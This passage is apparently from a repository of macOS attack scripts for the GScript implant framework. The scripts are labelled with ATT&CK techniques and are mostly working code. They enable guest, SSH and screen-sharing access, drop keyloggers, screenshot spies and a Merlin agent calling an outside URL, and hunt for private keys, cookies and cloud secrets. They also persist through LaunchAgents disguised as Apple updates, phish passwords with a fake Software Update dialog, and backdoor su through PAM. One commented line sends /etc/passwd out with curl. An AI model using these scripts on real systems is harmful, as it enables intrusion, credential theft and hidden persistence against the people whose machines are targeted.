33 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "UniqueID", "201"]);
34 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "UserShell", "/bin/bash"]);
35 | G.exec.ExecuteCommand("security", ["add-generic-password", "-A", "-w", "Guest", "-s", "com.apple.loginwindow.guest-account", "-D", "application password", "/Library/Keychains/System.keychain"]);
36 | var response2 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.AppleFileServer", "guestAccess", "-bool", "true"]);
37 | console.log("Pid: "+response2[0]);
38 | console.log("stdout: "+response2[1]);
39 | console.log("stderr: "+response2[2]);
40 | console.log("exit code: "+response2[3]);
41 | console.log("go errors: "+response2[4]);
42 | var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/SystemConfiguration/com.apple.smb.server", "AllowGuestAccess", "-bool", "true"]);
43 | console.log("Pid: "+response[0]);
44 | console.log("stdout: "+response[1]);
45 | console.log("stderr: "+response[2]);
46 | console.log("exit code: "+response[3]);
47 | console.log("go errors: "+response[4]);
48 | var response3 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "GuestEnabled", "-bool", "YES"]);
49 | console.log("Pid: "+response3[0]);
50 | console.log("stdout: "+response3[1]);
51 | console.log("stderr: "+response3[2]);
52 | console.log("exit code: "+response3[3]);
53 | console.log("go errors: "+response3[4]);
54 |
55 | console.log("Done Enable Guest");
56 | } else {
57 | console.log("Detected a non-root user, this needs to run as root!");
58 | }
59 | return true;
60 | }
61 |
62 |
--------------------------------------------------------------------------------
/attack/os_x/enable_remote_ssh.gs:
--------------------------------------------------------------------------------
1 | // enable remote ssh
2 | // Title: enable remote ssh
3 | // Author: jayhill
4 | // Purpose:To quickly turn on SSH server and allow incoming ssh connections to the current Mac.
5 | // Gscript version: 1.0.0
6 | // Tactic: Works really well when run w/ sshkey_persistence
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1021
8 |
9 | //priority:130
10 | //timeout:130
11 |
12 | //go_import:os/user as user
13 |
14 | function Deploy() {
15 | console.log("Enabling remoteSSH connection");
16 |
17 | //Ensure running as root
18 | var curUser = user.Current();
19 | console.log("Our user is: "+curUser[0].Username);
20 | if (curUser[0].Username == "root") {
21 | var execResp = G.exec.ExecuteCommand("systemsetup", ["-setremotelogin", "on"]);
22 | console.log("Pid: "+execResp[0]);
23 | console.log("stdout: "+execResp[1])
24 | console.log("stderr: "+execResp[2])
25 | console.log("exit code: "+execResp[3])
26 | if (execResp[4] != null) {
27 | console.log("go errors: "+Dump(execResp[4]))
28 | }
29 | } else {
30 | console.log("Not running as root!");
31 | }
32 |
33 | console.log("Done enable remoteSSH connection");
34 | return true;
35 | }
--------------------------------------------------------------------------------
/attack/os_x/enable_screensharing.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable screen sharing
3 | // Title: enable apple RDP
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
15 | function Deploy() {
16 | console.log("Enabling apple RDP service");
17 |
18 | //Ensure running as root
19 | var curUser = user.Current();
20 | console.log("Our user is: "+curUser[0].Username);
21 | if (curUser[0].Username == "root") {
22 | var execResp = G.exec.ExecuteCommand("defaults", ["write", "/var/db/launchd.db/com.apple.launchd/overrides.plist com.apple.screensharing", "Disabled", "-bool", "false"]);
23 | console.log("Pid: "+execResp[0]);
24 | console.log("stdout: "+execResp[1]);
25 | console.log("stderr: "+execResp[2]);
26 | console.log("exit code: "+execResp[3]);
27 | if (execResp[4] != null) {
28 | console.log("go errors: "+execResp[4].Errors());
29 | }
30 | var execResp2 = G.exec.ExecuteCommand("launchctl", ["load", "-w", "/System/Library/LaunchDaemons/com.apple.screensharing.plist"]);
31 | console.log("Pid: "+execResp2[0]);
32 | console.log("stdout: "+execResp2[1]);
33 | console.log("stderr: "+execResp2[2]);
34 | console.log("exit code: "+execResp2[3]);
35 | if (execResp[4] != null) {
36 | console.log("go errors: "+execResp[4].Errors());
37 | }
38 | } else {
39 | console.log("Not running as root!");
40 | }
41 |
42 | console.log("Enabling apple RDP service");
43 | return true;
44 | }
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/attack/os_x/goredloot_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedLoot
3 | // Author: ahhh
4 | // Purpose: Gathers target keys from the victim and stages (compresses / encrypts) them for exfil
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late pirority to run toward the end, will compress and encrypt to a random outfile
8 | // Uses: GoRedLoot to take search and stage: https://github.com/ahhh/GoRedLoot
9 |
10 | //priority:200
11 | //timeout:200
12 |
13 | //go_import:os/user as user
14 | //go_import:os as os
15 |
16 | //import:/private/tmp/GoRedLoot.macho
17 |
18 | function Deploy() {
19 | console.log("Starting GoRedLoot");
20 | // Getting our asset
21 | var lootBin = GetAssetAsBytes("GoRedLoot.macho");
22 | if (lootBin[1] != null) {
23 | console.log("errors: "+lootBin[1].Error());
24 | }
25 |
26 | // Get user home directory
27 | var myUser = user.Current();
28 | console.log(myUser[0]);
29 | var searchDir = myUser[0].HomeDir+"/";
30 |
31 | // Getting a random name and dropping file
32 | var temppath = os.TempDir();
33 | var naming = G.rand.GetAlphaNumericString(6);
34 | var name = naming.toLowerCase();
35 | name = temppath+"/"+name;
36 | G.file.WriteFileFromBytes(name, lootBin[0]);
37 | console.log("dropped the GoRedLoot binary here: "+name);
38 |
39 | // Create random out file
40 | var outfile = G.rand.GetAlphaNumericString(5);
41 | var tempp = os.TempDir();
42 | outfile = tempp+"/"+outfile.toLowerCase();
43 |
44 | // Executing child proc
45 | var proc = G.exec.ExecuteCommandAsync(name, [searchDir, outfile]);
46 | if (proc[1] != null) {
47 | console.log("errors: "+proc[1].Error());
48 | } else {
49 | console.log("pid: "+proc[0].Process.Pid);
50 | }
51 |
52 | console.log("Done GoRedLoot");
53 | return true;
54 | }
--------------------------------------------------------------------------------
/attack/os_x/goredprompt_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: GoRedPrompt to take screenshots: https://github.com/ahhh/GoRedPrompt
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 |
14 | //import:/private/tmp/GoRedPrompt.macho
15 |
16 | function Deploy() {
17 | console.log("Starting GoRedPrompt");
18 |
19 | // Getting our asset
20 | var promptBin = GetAssetAsBytes("GoRedPrompt.macho");
21 | if (promptBin[1] != null) {
22 | console.log("errors: "+promptBin[1].Error());
23 | }
24 |
25 | // Getting a random name and dropping file
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(6);
28 | var name = naming.toLowerCase();
29 | name = temppath+"/"+name;
30 | G.file.WriteFileFromBytes(name, promptBin[0]);
31 | console.log("dropped the goredprompt binary here: "+name);
32 |
33 | // Create random out file
34 | var outfile = G.rand.GetAlphaNumericString(5);
35 | var tempp = os.TempDir();
36 | outfile = tempp+"/"+outfile.toLowerCase();
37 |
38 | // Executing child proc
39 | var proc = G.exec.ExecuteCommandAsync(name, [outfile]);
40 | if (proc[1] != null) {
41 | console.log("errors: "+proc[1].Error());
42 | } else {
43 | console.log("pid: "+proc[0].Process.Pid);
44 | }
45 |
46 | console.log("Done GoRedPrompt");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/os_x/goredspy_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Uses: GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 |
14 | //import:/private/tmp/GoRedSpy.macho
15 |
16 | function Deploy() {
17 | console.log("Starting GoRedSpy");
18 | // Getting our asset
19 | var spyBin = GetAssetAsBytes("GoRedSpy.macho");
20 | if (spyBin[1] != null) {
21 | console.log("errors: "+spyBin[1].Error());
22 | }
23 |
24 | // Getting a random name and dropping file
25 | var temppath = os.TempDir();
26 | var naming = G.rand.GetAlphaString(4);
27 | var name = naming.toLowerCase();
28 | name = temppath+"/"+name;
29 | G.file.WriteFileFromBytes(name, spyBin[0]);
30 | console.log("dropped the goredspy binary here: "+name);
31 |
32 | // Create random out dir
33 | var tempp = os.TempDir();
34 | var outdir = G.rand.GetAlphaString(3);
35 | outdir = tempp+"/"+outdir.toLowerCase();
36 | G.exec.ExecuteCommand("/bin/mkdir", [outdir]);
37 |
38 | // Executing child proc
39 | var proc = G.exec.ExecuteCommandAsync(name, ["-outDir", outdir, "-count", "48", "-delay", "1800s"]);
40 | if (proc[1] != null) {
41 | console.log("errors: "+proc[1].Error());
42 | } else {
43 | console.log("pid: "+proc[0].Process.Pid);
44 | }
45 |
46 | console.log("Done GoRedSpy");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/os_x/grab_clipboard.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Grab Clipboard
3 | // Author: ahhh
4 | // Purpose: Grabs the contents of the clipboard to be written to a file or exfiltrated
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1115
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | function Deploy() {
14 | console.log("Starting Clipboard Data");
15 |
16 | var response = G.exec.ExecuteCommand("pbpaste", [""]);
17 | console.log("Pid: "+response[0]);
18 | console.log("stdout: "+response[1])
19 | console.log("stderr: "+response[2])
20 | console.log("exit code: "+response[3])
21 | if (response[4] != null) {
22 | console.log("errors: "+response[4].Error());
23 | }
24 |
25 | // Getting a random filepathc
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(5);
28 | naming = naming.toLowerCase();
29 | var fullpath = temppath+"/"+naming;
30 | console.log("file name: "+ fullpath);
31 | // Write file
32 | var errors = G.file.WriteFileFromString(fullpath, response[1]);
33 | if (errors != null) {
34 | console.log("errors: "+errors.Error());
35 | }
36 | console.log("Done Clipboard Data");
37 | return true;
38 | }
39 |
--------------------------------------------------------------------------------
/attack/os_x/https_exfiltration.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: HTTPS Exfiltration
3 | // Author: ahhh
4 | // Purpose: read a file, encode it, send json to a webserver
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1048
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
12 | var url = "https://example.com/";
13 | var target_file = "/etc/passwd";
14 |
15 | function Deploy() {
16 | console.log("starting HTTPS Exfiltration");
17 |
18 | // Ghetto exfil the target
19 | //var target_url = url+"$i";
20 | //var command = "/bin/cat "+target_file+" | xxd -ps -c 16 | while read i; do curl "+target_url+"; done;";
21 | //var response = G.exec.ExecuteCommand("/bin/sh", ["-c", command]);
22 |
23 |
24 | console.log("done, HTTPS Exfiltration");
25 | return true;
26 |
27 | }
--------------------------------------------------------------------------------
/attack/os_x/keylogger_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/keystroke.log
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using: this keylogger https://github.com/caseyscarborough/keylogger
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 | //go_import:os/user as user
14 |
15 | //import:/private/tmp/keylogger.macho
16 |
17 | function Deploy() {
18 | console.log("Starting keylogger");
19 | // Drop the sample
20 | var keylogBin = GetAssetAsBytes("keylogger.macho");
21 | if (keylogBin[1] != null) {
22 | console.log("errors: "+keylogBin[1].Error());
23 | }
24 |
25 | // get user homedir
26 | var curUser = user.Current();
27 | console.log("Our user is: "+curUser[0].Username);
28 | if (curUser[0].Username == "root") {
29 | // Getting a random name
30 | var temppath = os.TempDir();
31 | var naming = G.rand.GetAlphaString(4);
32 | var name = naming.toLowerCase();
33 | name = temppath+"/"+name;
34 | G.file.WriteFileFromBytes(name, keylogBin[0]);
35 | console.log("dropped the keylogger binary here: "+name);
36 |
37 | // Getting a random outfile
38 | var t2 = os.TempDir();
39 | var n2 = G.rand.GetAlphaString(6);
40 | n2 = n2.toLowerCase();
41 | n2 = t2+"/"+n2;
42 | console.log("writing log file here: "+n2);
43 |
44 | // Run the command
45 | var runner = G.exec.ExecuteCommandAsync(name, [n2]);
46 | if (runner[1] != null) {
47 | console.log("errors: "+runner[1].Error());
48 | } else {
49 | console.log("pid: "+runner[0].Process.Pid);
50 | }
51 | } else {
52 | console.log("Must be run as root");
53 | }
54 |
55 | console.log("Done keylogger");
56 | return true;
57 | }
--------------------------------------------------------------------------------
/attack/os_x/launch_agent_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Agent Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch agent plist and persist it using Launch Agent
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1159
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 | //import:/private/tmp/example_agent.plist
15 |
16 | var plist_name = "com.apple.updates.plist";
17 |
18 | function Deploy() {
19 | console.log("starting execution of Launch Agent Persistence");
20 | // Prep the asset
21 | var exBin = GetAssetAsBytes("example.macho");
22 | if (exBin[1] != null) {
23 | console.log("errors: "+exBin[1].Error());
24 | }
25 | // Prep the asset
26 | var exAgent = GetAssetAsBytes("example_agent.plist");
27 | if (exAgent[1] != null) {
28 | console.log("errors: "+exAgent[1].Error());
29 | }
30 |
31 | // Setup the binary
32 | name = "/usr/local/agent_example";
33 | var dropErr = G.file.WriteFileFromBytes(name, exBin[0]);
34 | if (dropErr != null) {
35 | console.log("errors: "+dropErr.Error());
36 | } else {
37 | console.log("dropped the example binary here: "+name);
38 | }
39 |
40 | // Setup the launch agent
41 | var whoami = user.Current();
42 | var home = whoami[0].HomeDir+"/";
43 | console.log("home Location: "+ home);
44 | var location1 = home + "/Library/LaunchAgents/" + plist_name;
45 | var location2 = "/System/Library/LaunchAgents/" + plist_name;
46 | var location3 = "/Library/LaunchAgents/" + plist_name;
47 | var dropErr2 = G.file.WriteFileFromBytes(location3, exAgent[0]);
48 | if (dropErr2 != null) {
49 | console.log("errors: "+dropErr2.Error());
50 | } else {
51 | console.log("dropped the agent plist here: "+location3);
52 | }
53 |
54 | // Persist the agent
55 | exec = G.exec.ExecuteCommand("launchctl", ["load", "-w", location3]);
56 | if (exec[4] == null) {
57 | console.log("Persisted binary using launch agent at: "+location3);
58 | console.log("Pid: "+exec[0]);;
59 | console.log("stdout: "+exec[1]);
60 | console.log("stderr: "+exec[2]);
61 | console.log("exit code: "+exec[3]);
62 | } else {
63 | console.log("go errors: "+execResp[4].Error()) ;
64 | }
65 |
66 | console.log("done, deployed binary with Launch Agent persistence");
67 | return true;
68 | }
--------------------------------------------------------------------------------
/attack/os_x/launch_daemon_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launch Daemon Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and a launch daemon plist and persist it using Launch Daemon
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1160
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os/user as user
12 |
13 | //import:/private/tmp/example.macho
14 | //import:/private/tmp/example_daemon.plist
15 |
16 | var plist_name = "com.apple.updatesd.plist";
17 |
18 | function Deploy() {
19 | console.log("Starting Launch Daemon Persistence");
20 |
21 | // Prep the asset
22 | var exBin = GetAssetAsBytes("example.macho");
23 | if (exBin[1] != null) {
24 | console.log("errors: "+exBin[1].Error());
25 | }
26 | // Prep the asset
27 | var exDaemon = GetAssetAsBytes("example_daemon.plist");
28 | if (exDaemon[1] != null) {
29 | console.log("errors: "+exDaemon[1].Error());
30 | }
31 |
32 | // Setup the binary
33 | name = "/usr/local/daemon_example";
34 | var dropErr = G.file.WriteFileFromBytes(name, exBin[0]);
35 | if (dropErr != null) {
36 | console.log("errors: "+dropErr.Error());
37 | } else {
38 | console.log("dropped the example binary here: "+name);
39 | }
40 |
41 | // Setup the launch daemon
42 | var whoami = user.Current();
43 | //var home = whoami[0].HomeDir+"/";
44 | var location1 = "/System/Library/LaunchDaemons/" + plist_name;
45 | var location2 = "/Library/LaunchDaemons/" + plist_name;
46 | var dropErr2 = G.file.WriteFileFromBytes(location2, exDaemon[0]);
47 | if (dropErr2 != null) {
48 | console.log("errors: "+dropErr2.Error());
49 | } else {
50 | console.log("dropped the agent plist here: "+location2);
51 | }
52 |
53 | // Persist the daemon
54 | exec = G.exec.ExecuteCommand("launchctl", ["load", "-w", location2]);
55 | if (exec[4] == null) {
56 | console.log("Persisted binary using launch agent at: "+location2);
57 | console.log("Pid: "+exec[0]);;
58 | console.log("stdout: "+exec[1]);
59 | console.log("stderr: "+exec[2]);
60 | console.log("exit code: "+exec[3]);
61 | } else {
62 | console.log("go errors: "+execResp[4].Error()) ;
63 | }
64 |
65 | console.log("Done Launch Daemon persistence");
66 | return true;
67 | }
68 |
--------------------------------------------------------------------------------
/attack/os_x/launchctl_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Launchctl Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using Launchctl
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1152
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
15 | var labelname;
16 | var binary_args = "";
17 |
18 | function Deploy() {
19 | console.log("Starting execution of Launchctl Persistence");
20 | // Prep the asset
21 | var exampBin = GetAssetAsBytes("example.macho");
22 | if (exampBin[1] != null) {
23 | console.log("errors: "+exampBin[1].Error());
24 | }
25 |
26 | // Getting a random name
27 | //var temppath = os.TempDir();
28 | var temppath = "/usr/local";
29 | var naming = G.rand.GetAlphaString(4);
30 | var name = naming.toLowerCase();
31 | name = temppath+"/"+name;
32 | G.file.WriteFileFromBytes(name, exampBin[0]);
33 | console.log("dropped the keylogger binary here: "+name);
34 |
35 | // Persist the sample
36 | var label = G.rand.GetAlphaString(6);
37 | label = label.toLowerCase();
38 | label = "com.apple."+label;
39 | var exec = G.exec.ExecuteCommand("launchctl", ["submit", "-l", label, "--", name]);
40 | if (exec[4] == null) {
41 | console.log("Persisted binary using launchctl, with the label: "+label);
42 | console.log("Pid: "+exec[0]);;
43 | console.log("stdout: "+exec[1]);
44 | console.log("stderr: "+exec[2]);
45 | console.log("exit code: "+exec[3]);
46 | } else {
47 | console.log("go errors: "+exec[4].Error()) ;
48 | }
49 | console.log("Done execution of Launchctl Persistence");
50 | return true;
51 | }
--------------------------------------------------------------------------------
/attack/os_x/loginhook_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: LoginHook Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a default Login Hook
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/techniques/T1164/
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
15 | function Deploy() {
16 |
17 | console.log("Starting Login Hook Persistence");
18 |
19 | // Prep the asset
20 | var exampBin = GetAssetAsBytes("example.macho");
21 | if (exampBin[1] != null) {
22 | console.log("errors: "+exampBin[1].Error());
23 | }
24 |
25 | // Getting a random name
26 | //var temppath = os.TempDir();
27 | var temppath = "/usr/local";
28 | var naming = G.rand.GetAlphaString(4);
29 | var name = naming.toLowerCase();
30 | name = temppath+"/"+name;
31 | G.file.WriteFileFromBytes(name, exampBin[0]);
32 | console.log("dropped the keylogger binary here: "+name);
33 |
34 | // Persist the sample
35 | exec = G.exec.ExecuteCommand("defaults", ["write", "com.apple.loginwindow", "LoginHook", name]);
36 | if (exec[4] == null) {
37 | console.log("Persisted binary using com.apple.loginwindow LoginHook");
38 | console.log("Pid: "+exec[0]);
39 | console.log("stdout: "+exec[1]);
40 | console.log("stderr: "+exec[2]);
41 | console.log("exit code: "+exec[3]);
42 | } else {
43 | console.log("go errors: "+execResp[4].Error());
44 | }
45 |
46 | console.log("Done Login Hook Persistence");
47 | return true;
48 | }
49 |
--------------------------------------------------------------------------------
/attack/os_x/looter_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GLoot
3 | // Author: ahhh
4 | // Purpose: Searches for files and can zip+encrypt them
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:180
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/ahhh/gloot as loot
13 |
14 |
15 | function Deploy() {
16 | console.log("Starting GLoot");
17 |
18 | // Prompt for the pw
19 | var ignoreNames = ["Keychains", ".vmdk", ".vmem", ".npm", ".vscode", ".dmg", "man1", ".ova", ".iso"];
20 | var ignoreContent = ["golang.org/x/crypto"];
21 | var includeNames = ["Cookies"];
22 | var includeContent = ["BEGIN DSA PRIVATE KEY", "BEGIN RSA PRIVATE KEY", "secret_access_key"];
23 |
24 | var goods = loot.Searcher("/Users/", ignoreNames, ignoreContent, includeNames, includeContent);
25 | console.log("the goods: "+ goods);
26 |
27 | // Pickup our prompter pw
28 | //goods.push("/private/tmp/gscript_special.txt");
29 |
30 | var file_location = "/private/tmp/ozz";
31 | var errs = loot.ZipFiles(file_location, goods, "testing");
32 | if (errs != null) {
33 | console.log("errors: "+errs.Error());
34 | } else {
35 | console.log("file newly created: " + file_location);
36 | }
37 |
38 | console.log("Done GLoot");
39 | return true;
40 | }
--------------------------------------------------------------------------------
/attack/os_x/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/merlinagent.macho
14 |
15 |
16 | function Deploy() {
17 | console.log("Starting to drop merlin binary");
18 |
19 | // Getting our asset
20 | var merlinBin = GetAssetAsBytes("merlinagent.macho");
21 | if (merlinBin[1] != null) {
22 | console.log("errors: "+merlinBin[1].Error());
23 | }
24 |
25 | // Getting a random path
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(4);
28 | naming = temppath + "/" + naming.toLowerCase();
29 | console.log("file name: "+ naming);
30 |
31 | // Write payload
32 | var errors = G.file.WriteFileFromBytes(naming, merlinBin[0]);
33 | if (errors != null) {
34 | console.log("errors: "+errors.Error());
35 | }
36 |
37 | // Run payload
38 | var running = G.exec.ExecuteCommandAsync(naming, ["-url", "https://example.com/"]);
39 | if (running[1] != null) {
40 | console.log("errors: "+running[1].Error());
41 | } else {
42 | console.log("pid: "+running[0].Process.Pid);
43 | }
44 |
45 | return true
46 | }
--------------------------------------------------------------------------------
/attack/os_x/merlin_example2.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.macho
12 |
13 |
14 | function Deploy() {
15 | console.log("Starting to drop merlin binary");
16 |
17 | // Getting our asset
18 | var merlinBin = GetAssetAsString("merlinagent.macho");
19 | console.log("errors: "+merlinBin[1]);
20 |
21 | // Getting a random string
22 | var basepath = "/private/tmp/";
23 | var naming = G.rand.GetAlphaString(10);
24 | naming = naming.toLowerCase();
25 | var fullpath = basepath+naming;
26 | console.log("file name: "+ fullpath);
27 |
28 | var errors = G.file.WriteFileFromString(fullpath, merlinBin[0]);
29 | console.log("errors: "+errors);
30 |
31 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
32 | console.log("errors: "+running[1]);
33 |
34 | return true
35 | }
--------------------------------------------------------------------------------
/attack/os_x/osascript_prompt.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Osascript Prompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password with the builtin Osascript
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1141
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting osascript prompt")
13 | var first = 'tell app "System Preferences" to activate';
14 | var second = 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"';
15 | var response = G.exec.ExecuteCommand("osascript", ["-e", first, "-e", first, "-e", second]);
16 | console.log("Pid: "+response[0]);
17 | console.log("stdout: "+response[1]);
18 | console.log("stderr: "+response[2]);
19 | console.log("exit code: "+response[3]);
20 | console.log("go errors: "+response[4]);
21 | return true;
22 | }
23 |
24 |
--------------------------------------------------------------------------------
/attack/os_x/prompter_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:80
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen2brain/dlgs as dlgs
13 |
14 |
15 | function Deploy() {
16 | console.log("Starting GPrompt");
17 |
18 | // Prompt for the pw
19 | passwd = dlgs.Password("System Preferences", "Enter your password to continue: ");
20 | if (passwd.length == 3) {
21 | if (passwd[2] != null) {
22 | console.log("errors: "+passwd[2].Error());
23 | } else {
24 | console.log("User input: " + passwd[0]);
25 | }
26 | } else {
27 | console.log("dlgs didn't execute right")
28 | }
29 |
30 | // Getting a file to save the output
31 | var temppath = os.TempDir();
32 | //var temppath = "/usr/local";
33 | //var naming = G.rand.GetAlphaString(5);
34 | var naming = "gscript_special.txt"
35 | var name = naming.toLowerCase();
36 | name = temppath+"/"+name;
37 | var dropErr = G.file.WriteFileFromString(name, passwd[0]);
38 | if (dropErr != null) {
39 | console.log("errors: "+dropErr.Error());
40 | } else {
41 | console.log("dropped the pw here: "+name);
42 | }
43 |
44 | console.log("Done GPrompt");
45 | return true;
46 | }
--------------------------------------------------------------------------------
/attack/os_x/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to users accounts
4 | // Gscript version: 1.0.0
5 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
6 | // Note: Assumes ssh key access is already enabled
7 |
8 | //priority:110
9 | //timeout:75
10 |
11 | //go_import:os as os
12 | //go_import:os/user as user
13 |
14 | //import:/private/tmp/id_rsa.pub
15 |
16 | function Deploy() {
17 | console.log("Started SSH key persistence!")
18 |
19 | // Getting our asset
20 | var pubKey = GetAssetAsBytes("id_rsa.pub");
21 | if (pubKey[1] != null) {
22 | console.log("errors: "+pubKey[1].Error());
23 | }
24 |
25 | // get user homedir
26 | var myUser = user.Current();
27 | console.log(myUser[0].Username);
28 | var homeydir = myUser[0].HomeDir+"/";
29 | if (myUser[0].Username == "root")
30 | {
31 | homeydir = "/var/root/";
32 | }
33 |
34 | // make .ssh dir
35 | var dirname = homeydir+".ssh/";
36 | var dirstat = G.file.CheckExists(dirname);
37 | if (dirstat == false) {
38 | G.exec.ExecuteCommand("/bin/mkdir", [dirname]);
39 | }
40 |
41 | //make or add to authorize keys file
42 | var filename = homeydir + ".ssh/authorized_keys";
43 | var stat = G.file.CheckExists(filename);
44 | if (stat == false) {
45 | errors = G.file.WriteFileFromBytes(filename, pubKey[0]);
46 | if (errors != null) {
47 | console.log("errors: "+errors.Error());
48 | } else {
49 | console.log("SSH key added");
50 | }
51 | } else {
52 | var appendedFileError = G.file.AppendFileBytes(filename, pubKey[0]);
53 | if (appendedFileError != null) {
54 | console.log("errors: "+appendedFileError.Error());
55 | } else {
56 | console.log("SSH key appended");
57 | }
58 | }
59 | console.log("Done SSH key persistence!");
60 | return true;
61 | }
62 |
--------------------------------------------------------------------------------
/attack/os_x/su_pam_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Su pam Persistence
3 | // Author: ahhh
4 | // Purpose: replaces the pam directive for the root user w/ on that just auths succesful
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
12 | function Deploy() {
13 | console.log("starting execution of Su Persistence");
14 |
15 | var replaceError = G.file.ReplaceInFileWithString("/etc/pam.d/su", "pam_rootok.so", "pam_permit.so");
16 | console.log("errors: "+ replaceError);
17 |
18 | console.log("done Su Persistence");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/os_x/tamper_histcontrol.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Tamper Histcontrol
3 | // Author: ahhh
4 | // Purpose: sets HISTCONTROL=ignorespace for bash shells,
5 | // such that a malicious user can launch new terminals and use a single space before a command to evade the history file
6 | // Gscript version: 1.0.0
